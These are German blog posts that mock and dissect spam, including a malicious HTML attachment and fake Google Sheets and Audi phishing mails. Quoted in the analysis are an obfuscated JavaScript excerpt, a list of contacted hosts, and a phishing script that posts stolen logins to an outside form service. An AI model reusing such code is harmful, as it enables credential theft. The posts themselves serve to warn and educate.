Kategoriearchiv „Mail“

New Purchace Order JCPlastics 1010025

Montag, 13. Oktober 2025

Muss ja sehr wichtig sein. Da ist eine Nummer drin. Und der (bei mir eigentlich recht scharf eingestellte) Spamfilter hat aus unerfindlichen Gründen auch nichts auszusetzen gehabt, sondern die Spam einfach durchgelassen.

Von: JCPLASTICS <veronica.padilla@jcplastics.com.mx>
An: admin@tamagothi.de

Und nicht nur das: Die Mail geht auch an eine ganz besondere Mailadresse… wie ich sie niemals für normale Kommunikation verwenden würde. Da sieht man mal, wie wichtig es ist. Was ist es nur, dieses „es“? 🤔️

Leider enthält die Spam kein Wort Text. Keine Begrüßung, kein Abschied, nichts. Natürlich auch kein Mailimpressum oder irgendeinen Hinweis, um was es geht. Alles, was es darin gibt, ist ein Anhang. Dieser ist eine HTML-Datei…

$ file NEW\ ORDER\ 1010025.html 
NEW ORDER 1010025.html: HTML document, ASCII text, with very long lines (9000), with CRLF line terminators
$ sed -n 15,41p NEW\ ORDER\ 1010025.html
<script>
(function (b, f) {
    var u = {
            b: 0×20b,
            f: 0×1ec,
            g: 0×218,
            h: 'UPQO',
            i: '9I9@',
            j: 'Jo94',
            k: 0×21a,
            l: 'qbQZ',
            m: 0×1cf,
            v: 0×21c,
            w: 'cjQA',
            x: 'uPsR'
        }, n = d, g = b();
    while (!![]) {
        try {
            var h = -parseInt(n(u.b, 'oIQY')) / 0×1 + parseInt(n(u.f, '&FUQ')) / 0×2 + parseInt(n(u.g, 'V66o')) / 0×3 * (-parseInt(n(0×1c9, u.h)) / 0×4) + parseInt(n(0×1ce, u.i)) / 0×5 + parseInt(n(0×1ff, u.j)) / 0×6 * (-parseInt(n(u.k, u.l)) / 0×7) + -parseInt(n(u.m, '*4HT')) / 0×8 + -parseInt(n(u.v, u.w)) / 0×9 * (-parseInt(n(0×1d7, u.x)) / 0xa);
            if (h === f)
                break;
            else
                g['push'](g['shift']());
        } catch (i) {
            g['push'](g['shift']());
        }
    }
$ _

…mit vorsätzlich extrem kryptisch formuliertem Javascript, das jede Analyse erschweren soll. Was ich da eben gezeigt habe, ist nur ein kleiner Ausschnitt, und eigentlich noch ein halbwegs verständlicher. Der größte Teil sieht eher noch schlimmer aus. Kein Mensch würde so coden, wenn er nicht etwas zu verbergen hätte.

Ich kann nur dringend empfehlen, diesen Anhang nicht zu öffnen. Denn sonst bekommt man schnell einen „Sicherheitscheck“ seines Computers durch Kriminelle, und wenn dabei ausbeutbare Lücken im Betrübssystem oder im Browser gefunden werden, gibts eine aktuelle Kollektion von Schadsoftware. Für das Antivirus-Schlangenöl würde es so aussehen, als wenn eine lokale Datei geöffnet wurde, und da wird dann auch öfter mal nicht ganz so energisch geprüft, um den vom Antivirus-Schlangenöl eh schon stark ausgebremsten Computer nicht noch lahmer werden zu lassen. VirusTotal findet zwar im Moment noch keine Schadsoftware, aber das Antivirus-Schlangenöl hinkt den laufenden kriminellen Machenschaften immer ein paar Tage hinterher, und diese Spam ist ganz frisch und eben erst angekommen. Besser und wichtiger als jedes Antivirus-Schlangenöl ist ein funktionierendes Gehirn, das sofort bemerkt, dass diese Mail stinkt und sie einfach löscht.

Für Genießer – nein, ich habe keine Lust, das alles in meiner virtuellen Maschine für solche Zwecke noch weiter zu analysieren: Es werden mindestens die folgenden Domains und IP-Adressen kontaktiert, um nach Hause zu telefonieren und Zeugs aller Art nachzuladen, während man sich ungläubig das harmlos und statisch aussehende Browserfenster anschaut.

edge-mobile-static.azureedge.net
business.bing.com
goodmuzikz.com
kit.fontawesome.com
aadcdn.msftauth.net
code.jquery.com
logo.clearbit.com
i.gyazo.com
ip-api.com
clients2.googleusercontent.com
cdnjs.cloudflare.com
23.217.77.128
184.25.59.69
199.232.210.172
135.233.95.144
20.189.173.14
23.195.81.9
52.111.229.43
23.2.94.216
142.251.184.106
108.177.121.103

Der (nicht ganz aktuelle) Edge-Browser von Microsoft wird dabei zum Absturz gebracht, nachdem er mich für rd. eine halbe Minute aufgefordert hat, doch bitte meine Mailadresse und mein Passwort einzugeben, während im Hintergrund ein unscharfes Bild eines Dokumentes angezeigt wird, es werden also – neben dem Phishing auf Mailpasswörter – Fehler im Browser mit unverständlichem Programmcode provoziert. Gut, dass es nur eine virtuelle Maschine war, in der ich einfach meinen Snapshot einer sauberen Installation zurückspiele! Wäre es mein Arbeitssystem, dann „dürfte“ ich mir jetzt den Tag verderben, indem ich es neu installiere… und wäre es ein Arbeitsrechner im Netzwerk eines Unternehmens, dann hätte der Klick in die Mail vielleicht sogar die kommende Insolvenz des Unternehmens besiegelt. Das Antivirus-Schlangenöl hätte nicht einmal gewarnt. Deshalb klickt man ja auch nicht in eine E-Mail, ohne sich vorher beim angeblichen Absender telefonisch (oder über einen sonstigen anderen Kanal als E-Mail) zu vergewissern, dass die E-Mail wirklich von ihm kommt. Und wenn das nicht möglich ist oder wenn man den Absender gar nicht kennt, klickt man überhaupt nicht in eine E-Mail. Es ist dumm und gefährlich.

Dass niemand einen Anhang machen würde, wenn man etwas auch einfach und barrierefrei direkt in die Mail schreiben kann, brauche ich hoffentlich nicht zu erwähnen.

Betrifft: Betreff

Samstag, 11. Oktober 2025

„Fortschrittliche Fußtherapie-Zentrale“

Oh schön, in Anführungszeichen. Das soll wohl „seriös“ aussehen. Wer schreibt da? Oh: „Von: Spezialisten für Kräuterpflaster“. Da frage ich mich nur noch, ob ich die Pflaster auch mit heißem Wasser aufgießen kann, um ein schmackhaftes Warmgetränk zu haben.

🥒 Natürlich stärker, vitaler 💪 Gesunde Unterstützung für Männer 💪natürlich und ohne Nebenwirkungen! 🥒

Es gibt zwei völlig klare Anzeichen für Quacksalberei und Beutelschneiderei, die eigentlich nur gegen das schlimme Schwerer-Geldbeutel-Syndrom hilft, nämlich die Zusicherungen…

… „natürlich“ und
… „ohne Nebenwirkungen“.

Die Kombination ist immer ein besonders klarer Fall. Vor allem, wenn sie mit einer Spam kommt, in deren Betreff so viele lustige Emojis 🤡️ eingestreut sind 🥳️, dass man die Leere und Sinnlosigkeit 🕳️ des Textes 📕️ gar nicht mehr bemerkt. Da braucht man die Spam gar nicht mehr zu lesen. Sie ist eh ohne Text, weil alles in einem Bild gesagt wird, das eine sicher konfigurierte Mailsoftware gar nicht aus dem Web nachlädt. Warum? Weil der Müll sonst durch keinen Spamfilter dieser Welt hindurchkäme.

Der clevere Weg, Knieschmerzen zu lindern

Der Spamapotheker kennt gegen jedes Zipperlein ein Mittelchen, aber wer darauf reinfällt, ist eines nicht: clever. Eher das genaue Gegenteil. 😉️

⚡ Nur heute: Sichern Sie sich Ihr Makita Tool Set GRATIS bei Lidl!

Echt jetzt, nur heute?

Perfekte Ausrichtung der Wirbelsäule während des Schlafs – heute 70 % Rabatt

Und, auf welchen Grundpreis gibts den Rabatt? Ach, Leute, die einen Taschenrechner bedienen können, sind für den Abzock schon zu intelligent?

Hören Sie wieder klar und deutlich mit OmniHear.

Oh, den Quatsch mit einem „KI-Hörgerät“ hatte ich noch nie. Na, wenn man von einer Sache zum ersten Mal in einer Mail „hört“, bei der die eigene Mailadresse gar nicht als Empfänger drinsteht (klares Zeichen für Massenpest) und dessen Absender man gar nicht kennt, dann weiß man auch, was man davon zu halten hat. Das sieht man andernorts offenbar ähnlich.

Nicht darauf reinfallen! Es gibt keinen Grund, warum angelernte neuronale Netzwerke – von Politikern, Journalisten und sonstigen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir alle mehr Reklame als Deutsch denken und reden – etwas an einem Hörgerät verbessern sollten. Stattdessen wird der damit einhergehende hohe Energiebedarf den Akku ganz schnell leernuckeln. Aber wenn es mit der Spam kommt, ist es eh nur Lüge und grenzbetrügerische Abzockerei.

Ihre Lebensqualität zurückgewinnen

Um etwas zurückgewinnen zu können, muss ich es ja mal gehabt haben, oder? Ach so, der Spammer meint, dass der Pimmel wieder steif wird. 😁️

Die Pimmelpille vom Spamapotheker hilft da jedenfalls nicht. Das ärztliche Rezept für ein entsprechendes Medikament hingegen sehr wohl. Das ist billiger, und es hat eine Hammerwirkung.

Ihr zusätzlicher 50 GB „Cloud-Speicher“ ist da

Oh, „Cloud-Speicher“ in Anführungszeichen? Was das wohl bedeuten mag? Ich habe übrigens gar keinen Cloudspeicher bei irgendeiner Klitsche – bei meinem alten DropBox-Account habe ich mal das Passwort verbaselt, so selten hatte ich daran Bedarf – und „zusätzlich“ klingt dann schon sehr lachhaft. Ich verstehe eh nicht, was die Leute mit langsamem und irgendwann teurem Cloudspeicher wollen, wenn Speicher so schnell, billig und leicht transportabel ist.

Es gibt übrigens keine Cloud. „Cloud“ ist ein Reklamewort, das die Wirklichkeit verbergen soll. Es gibt nur die Computer anderer Leute.

„Schützen Sie Ihre Geräte und senken Sie die Kosten“

Mache ich doch schon, indem ich nicht auf Spammer reinfalle.

Passt in Ihre Tasche – Internetzugang weltweit

Meint der Spammer etwa eines dieser neumodischen Handys?

Bewegen Sie sich bequem mit magnetischen Einlagen.

Ein ideales Angebot für Menschen mit Eisenfüßen.

Information zu Ihrer Online-Rückerstattung.

Wie, ich kriege mein Online zurück?

Re: Wieso bekomme ich von Ihnen immerzu Spam

Von mir? Mal ausprobieren. Oh, tatsächlich, die Absenderadresse ist eine Weiterleitung auf mein Postfach. Die Mail kam übrigens aus einer Softwareklitsche aus der wunderhübschen Stadt Essen. Eine Softwareklitsche, in der die Leute nicht zu wissen scheinen, dass jede Absenderadresse in einer Spam eine Fälschung ist und dass man dem Spammer niemals antworten kann. Es ist ja so schwierig geworden, gute Leute zu finden. Gerade, wenns um Computerkrams geht. Aber die Preise, die Kunden bezahlen werden, die werden sicherlich nach guten Leuten aussehen… 😁️

(Nein, ich nenne hier keine Firmierung. Das erledigt der Markt sowieso über kurz oder lang von selbst. Viel Spaß beim Bankrott! Intellektuell ist er schon längst eingetreten.)

„Mehr Sicherheit mit smarter Appsteuerung“

Wobei gibt es mehr Sicherheit? Beim Treppensteigen? Am Autofahren mit dem Handy in der Hand? Bei der morgendlichen Kotformung? Beim Lesen der Spam? Egal, hauptsache „Smart“ und „App“. Zielgruppe sind Leute, die nicht so „smart“ sind.

Hypoallergener Memory-Schaum – jede Nacht sauberer Schlaf

Oh, gibt es schon Schaumwindeln mit Gedächtnis?

Your MetaMask Wallet Needs Immediate Verification

Ja, schon klar. Ich habe gar kein Kryptogeld. Und ich will auch keins. Eine bei MetaMask rumliegende Wallet habe ich erst recht nicht. So weit käme es noch, dass ich irgendwelchen Dritten mein Kryptogeld anvertrauen würde, wenn ich welches hätte. Das Versprechen des Kryptogeldes war ja einst, dass es so etwas wie Banken und das ganze damit verbundene, ziemlich vampiristische Geschäftsmodell überflüssig machen würde, aber inzwischen haben die Leute ein ziemlich umfassendes Kryptogeld-Bankwesen, nur nicht gesetzlich reglementiert wie richtige Banken. Und Phishingspam wie die Bankkunden, die kriegen sie auch. Klick mal hier, gibt deine Passphrase ein, klick mal dort. Der wichtigste Unterschied: Auf Kulanz braucht man gar nicht erst zu hoffen, wenn man darauf reingefallen ist: Sind die Bitcoin erstmal weg, hat sie jemand anders.

Boost Your Mission with a $10,000 Monthly Google Grant.

Oh, mit Punkt am Ende. Schön, dass ich dank meiner Mailadresse eigentlich jeden Tag Geld geschenkt bekomme. Jedenfalls sagen die Spammer das immer. Vermutlich, weil ich so eine schöne Mailadresse habe, denn meinen Namen kennen sie nicht. Zehntausend Dollar bedingungsloses Grundeinkommen pro Monat hat mir bislang auch noch niemand angeboten, immer nur irgendwelche herrenlosen Millionen, die ich ziemlich grundlos bekommen sollte. Das klingt aber mit einem hohen „Gehalt fürs Nixtun“ genau so unglaubwürdig wie die Milliönchen.

This tactical bag is smarter than it looks

So lange der Rucksack nicht schlauer als ich ist… oh, der hat einen Akku, den man laden soll? Der ist sicher nicht schlauer als ich.

Endlich wieder volle Leistung mit „Volt V“

Die Leistung wäre aber Watt W. 🤭️

Zeit für die Löschleistung. Weg mit der Spamspannung. Entf! Und gut.

🚗 ADAC Geschenk: Ihr neues Auto-Notfallset ist da!

Freitag, 10. Oktober 2025

Der Wiedergänger des Tages

Oh, ich habe diese Dummfrage-Spams – komm, wir sind ADAC und schenken dir auch was, wenn du klicki-klicki ein paar ganz dumme Fragen beantwortest, und jetzt mach dich mal schön vor Spammern datennackig – gar nicht vermisst, als sie mal ein paar Monate lang nicht mehr gesehen habe.

🛠️ Kostenloses ADAC Car Emergency Kit sichern

Das Bild wird aus der Cloud von Google, dem dicksten Kumpel und Komplizen des Spammers und Betrügers nachgeladen. Von einer Abuse-Meldung bei Google nehme ich Abstand. Ich habe heute keinen Appetit auf eine Portion Kafka.

Nein, der ADAC hat damit ganz sicher nichts zu tun. So eine Spam kommt sogar bei mir an, der ich ganz sicher nicht Mitglied des ADAC bin. Ich habe nicht einmal einen Führerschein, und erst recht kein Auto. Was soll ich da mit dem Auto-darf-alles-Club? Aber selbst, wenn ich in dem Club drin wäre, hätte der keine Mailadresse von mir. Oder nur eine sehr spezielle, wenn ich die Angabe nicht vermeiden könnte, damit ich den Müll besser vorsortieren kann. Ich kriege schon genug Spam. Und so genannter „Autojournalismus“ ist nichts als Spam, Lüge, Bestubsung, Schleichwerbung und Fakenews. Wenn der über irgendetwas aufklären würde, dann würden die Leute doch keine Autos kaufen, die ihnen wegen technofeudalistischer Gängelsoftware mit Abzockschnittstelle der Marke „Zahlen sie monatlich soundsoviel Øre, um eine bereits in ihr Auto verbaute Funktion nutzen zu können, am besten bargeldlos und bequem per Bankeinzug“ gar nicht selbst gehören. So dumm ist doch keiner. So dumm kann man doch gar nicht sein… oder? ODER?! 😱️

Alle Daten, die man angibt – das gilt auch für die angebliche Lieferadresse und eventuelle weitere Angaben wie Telefonnummer, Geburtsdatum und Kreditkartennummer – gehen direkt an spammende Kriminelle, die am liebsten unter falschem Namen auftreten.

Ich hoffe mal, dass die Nummer inzwischen nicht mehr läuft. Es gab eine Zeit, in der ich solchen Müll nahezu täglich hatte, auch mit angeblichen Umfragen ganz vieler Unternehmen.

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
Die Domain tamagothi.de wird nicht von Google verwaltet.
Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrauchte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

„Finden Sie Ihre Gegenstände jederzeit und überall“

Dienstag, 7. Oktober 2025

Oh, mal wieder ein Betreff in Anführungszeichen. Das hatte ich jetzt lange nicht. Und diesmal sogar halbwegs richtig, wenn man mal davon absieht, dass Anführungszeichen in einem Betreff nicht so ganz richtig sind.

Wer schreibt mir denn?

Von: verliere nie etwas . <support@jnd.landexperts.in>

Aha, jemand, dessen Name auf einen Punkt endet. Lauter Dinge, die das Spamfiltern so erfreulich einfach machen. Na, vielleicht verstehen die Spammer irgendwann doch noch mal ihr Skript.

Aber bis dahin lösen sie mir tolle Probleme:

Machen Sie sich nie wieder Sorgen um verlorene Gegenstände

Ja, das war die gesamte Spam. Keiner kann nach Genuss dieses Kürzsttextes auch nur erahnen, um was es geht. Wenn man zum Beispiel seinen gesamten Besitz wegschmeißt oder den Spammern schenkt, macht man sich auch nie wieder Sorgen um verlorene Gegenstände. Und man hat viel mehr Platz. 😉️

Nun gut, die leider immer noch viel zu vielen Menschen, die keinen Wert auf ihre Privatsphäre legen und deshalb eine unsicher konfigurierte Mailsoftware benutzen, die einfach in E-Mail eingebettete Bilder aus dem Web nachlädt und dabei „zurückfunkt“, dass die Mail angekommen ist und zu welcher Uhrzeit sie mit welcher Software gelesen wurde¹, sehen zusätzlich noch ein Bildchen mit viel Text drin, nämlich dieses hier:

Schön, dass man damit sogar Kinder orten kann, zumindest, so lange sie sich in Bluetooth-Reichweite (bei leistungsstarken Sendern: rd. hundert Meter, doch für ein Klasse-1-Gerät hält ein kleiner Akku nicht so lange und schon gar keine dreißig Tage) aufhalten. Das geht dann aber meistens einfacher und ohne Technik. Zum Beispiel durch altmodisches Hinschauen oder durch Rufen. Ideal auch für Menschen wie mich, die aus vielerlei Gründen kein so genanntes „Smartphone“ benutzen wollen. 😁️

Menschen, die auf solche Spams und ihre vorsätzlich irreführenden Anpreisungen reingefallen sind, sind dann auch dementsprechend „begeistert“ von diesem großartigen Produkt aus dem Spameingang. Ja, das Lesen bei Trustpilot lohnt sich, dieser für Preise zwischen rd. fünfzig und rd. neunzig Euro verkaufte fabrikneue Müll ist nämlich hart an der Grenze zum Betrug. Ich bin gar nicht überrascht, dass es sich um eine Abzocke handelt, die Leuten ohne besonderes technisches Verständnis angedreht werden soll, denn das wurde schon beim Lesen des offensichtlich computerübersetzten und vermutlich mit einem angelernten neuronalen Netzwerk generierten Textes im Bild aus der Spam klar. Hier werden Dumme und Ahnungslose am Geldbeutel abgemolken, die ihr ganzes Leben lang von Schule, Reklame und Journalismus zu digitalen Analphabeten gemacht wurden und denen man wirklich jeden Quatsch erzählen und jeden fabrikneuen Müll verhökern kann.

¹Wer sich fragt, woher ich dann das Bild habe: Ich habe in den HTML-Quelltext der Mail geschaut, dort die Bildadresse markiert und in die Zwischenablage kopiert, um an der Kommandozeile curl `xsel -bo | qpdecode` >verlust abzusetzen und die Datei zu untersuchen. Was tut man nicht alles, um ein kleines Blog über Spam vollzumachen… na gut, so viel Mühe ist es auch wieder nicht.

Audi bringt den Vorsprung im Oktober

Freitag, 3. Oktober 2025

Diese E-Mail kommt nicht von Audi. Sie ist eine Spam. Auch, wenn sie irgendwie durch den Spamfilter geflutscht ist… wie zum Beispiel gestern bei mir. Eine vergleichbare Spam hatte ich schon im August dieses Jahres für Porsche, und die war im Grunde verblüffend ähnlich. Vermutlich läuft genau die gleiche Nummer mit diversen hochpreisigen Automarken.

Wie gewünscht – Ihr neuester Audi Katalog

Nein, ich habe mir das nicht gewünscht. Ich brauche kein Auto. Was soll ich auch damit? Ich will auch kein Auto. Ich habe nicht einmal einen Führerschein. Und ich habe niemals einen gewollt. Aus vielen Gründen, die allesamt älter als die moderne Umweltschutzbewegung sind und etwas mit meiner Zuneigung zum Leben, zum Miteinander und zu den Menschen zu tun haben. Keine technische Errungenschaft des letzten Jahrhunderts hat die Gesellschaft so tiefgehend zerstört und so viele Menschen so dumm und irre gemacht wie das Auto.

Aber lassen wir das und gehen weiter durch die Spam.

Werte Damen und Herren,

Ja, eines von beidem bin ich, aber…

wie angefordert schicken wir Ihnen den neuesten Audi Katalog.

…angefordert habe ich nichts.

Im aktuellen Event-Katalog finden Sie die umfassende Zusammenstellung aller erhältlichen Premium Fahrzeuge.

Wie, „Event-Katalog“. Ich dachte, ihr verkauft Autos. Seid ihr jetzt auch Konzertveranstalter? 😅️

Jedes Fahrzeug wurde sorgfältig beschrieben mit den wichtigsten wichtigen Details, Optionen und gültigen Preisen.

Ja, ich kenne Reklame schon länger. Reklame zu vermeiden, gehört zu meinen wichtigsten wichtigen Wichtigkeiten, die mir wichtig und von Wichtigkeit sind. Aber schön, dass die Preise auch gelten und nicht einfach nur irgendwelche bedeutungslosen Losnummern oder gemeinen Lügen sind.

(Man kann schon an der Sprache bemerken, dass diese Mail eine Spam ist. Werber klingen zwar auch oft dumm, vor allem, wenn sie eine dümmliche und intelligenzverachtende Zielgruppenansprache pflegen, aber so viel konzentrierte Dummheit, Blähwut und sprachliche Inkompetenz vermeiden sogar Werber. Obwohl sie wirklich nicht viele Hemmungen haben.)

Besonders hervorzuheben sind unsere aktuellsten Modelle mit fortschrittlicher Technologie und umweltfreundlichen Motoren.

Besonders hervorzuheben ist das Verkäufergeschwätz aus der Faselhölle.

Den kompletten Katalog können Sie direkt betrachten:

→ Katalog online einsehen

Oh, das ist ja gar nicht die Domain der Audi-Website. Mal schauen, wo die Reise hingeht. Für alle, die sich vor der Kommandozeile eines unixoiden Betrübssystems ekeln: Spam fasse ich nur mit der Kneifzange an, und das aus Gründen, also gegebenenfalls bitte einfach überlesen.

$ location-cascade https://audi-zentrum-events.de/
     1	https://audi-ag-group.de/
     2	/AudiAngebotSeptember.pdf
$ curl -s https://audi-ag-group.de/AudiAngebotSeptember.pdf >audikatalog.pdf
$ file audikatalog.pdf
audikatalog.pdf: PDF document, version 1.6 (zip deflate encoded)
$ pdfinfo audikatalog.pdf
Title:           
Creator:         Adobe Acrobat 25.1
Producer:        Adobe Acrobat 25.1 Image Conversion Plug-in
CreationDate:    Fri Sep 19 07:43:54 2025 CEST
ModDate:         Fri Sep 19 10:56:59 2025 CEST
Custom Metadata: no
Metadata Stream: yes
Tagged:          no
UserProperties:  no
Suspects:        no
Form:            none
JavaScript:      no
Pages:           11
Encrypted:       no
Page size:       595.37 x 841.93 pts (A4)
Page rot:        0
File size:       1991219 bytes
Optimized:       yes
PDF version:     1.6
$ pdftotext audikatalog.pdf – | wc
      0       0      11
$ _

Die haben auf der Indexseite ihrer Website gar keine HTML-Seite, wie man das aus dem gesamten Web gewohnt ist, sondern es gibt gleich ein PDF-Dokument.

Dieses PDF-Dokument enthält auf seinen elf Seiten insgesamt elf leere Zeilen ohne ein einziges Wort Text. Es besteht nur aus Grafiken. Kein echter Katalog eines wirklichen Unternehmens würde so aussehen. Ich gebe mir mal das „Vergnügen“, dieses Dokument in Gimp zu importieren und zu zeigen, warum das kein Unternehmen so machen würde, jedenfalls nicht mit verlustbehafteten Grafikformaten. So sieht der Text im Katalog in Originalgröße aus:

Textbeispiel aus dem PDF.

Ich habe für dieses Beispiel ein verlustfreies PNG aus dem Ausschnitt gemacht. Die JPEG-Artefakte sind also nicht bei meiner Bearbeitung entstanden, sondern kommen genau so aus dem Katalog. Und genau so sieht der gesamte Katalog auf jeder seiner Seiten aus. Nein, das sieht wirklich nicht gut aus. Sogar gelehrige Blindenhunde fangen hier schon mal zu kläffen an. Wenn man eine verkleinerte Version am Bildschirm oder gar am Handy sieht, fällt es vermutlich gar nicht weiter auf, aber spätestens, wenn man eine Seite mal ausdruckt, tut es in den Augen weh.

Und die miese Qualität in den 1,9 MiB geht noch weiter. Ich weiß ja nicht, wo diese Spammer ihre Autofotos hergenommen haben. Ich weiß nur, dass ich jetzt nicht eigens eine große, verlustfreie Grafik verwenden werde, wenn ein Bild – hier im Blog sogar noch etwas verkleinert, was dem Bild ein wenig schmeichelt, in Originalgröße mit Kontext sieht es noch schlimmer aus – so unscharf, verschwommen, artefaktreich, unbrauchbar ist:

So lange man nicht hinguckt, sieht es beinahe wie eine Autoreklame aus. 😂️

Falls Sie Interesse zu einem speziellen Fahrzeug haben oder eine individuelle Betreuung wünschen, stehen wir Ihnen selbstverständlich zur Verfügung.

Nein, ich will nicht von euch „betreut“ werden. 😱️

Außerdem berichten wir Sie gerne über kommende Events und spezielle Aktionen in unserem Showroom.

Und, sind die besser als euer Katalog? 😁️

Für zusätzliche Informationen können Sie:

→ Detailinformationen erhalten

→ Direkt anrufen: +49-841-90-██-██-51

Die Telefonnummer habe ich unkenntlich gemacht. Egal, welchen der Links man klickt, er bringt einem nur in Kontakt mit kriminellen Spammern, die vermutlich einen Betrug versuchen werden. Das Geld, das man denen fürs Auto gibt, sieht man nicht wieder, und ein Auto gibt es auch nicht. Denn sonst würden sie ja nicht spammen und so tun, als ob sie Audi wären.

Unser erfahrenes Beraterteam freut sich darauf, Ihnen bei der Wahl Ihres idealen Fahrzeugs zu beraten.

Die erfahrene Betrügerbande freut sich schon auf neue Opfer. So viel Geld, dass man den Menschen einfach am Telefon aus der Tasche quasseln kann.

Wir hoffen, dass die Übersicht Ihnen bei Ihrer Entscheidung hilft und freuen uns auf Ihre Nachricht.

Eine Spam hilft bei jeder Entscheidung. Finger weg, und man schützt seinen Geldbeutel. Für Reklame gilt das übrigens auch. Für jede Reklame. Der wichtigste Unterschied ist, dass Reklame leider legal ist. Spam ist illegal. Asozial, verlogen, hinterhältig und manipulativ sind beide. 💡️

Mit herzlichen Grüßen,
Ihr Audi Zentrum Events Team

Wenn hier das Herz grüßt, will ich den Arsch nicht mehr kennenlernen.

Hinweis: Unser Event-Katalog enthält ebenfalls Informationen zu laufenden Sonderkonditionen, Terminen, Garantieleistungen und unserem umfassenden After-Sales-Service.

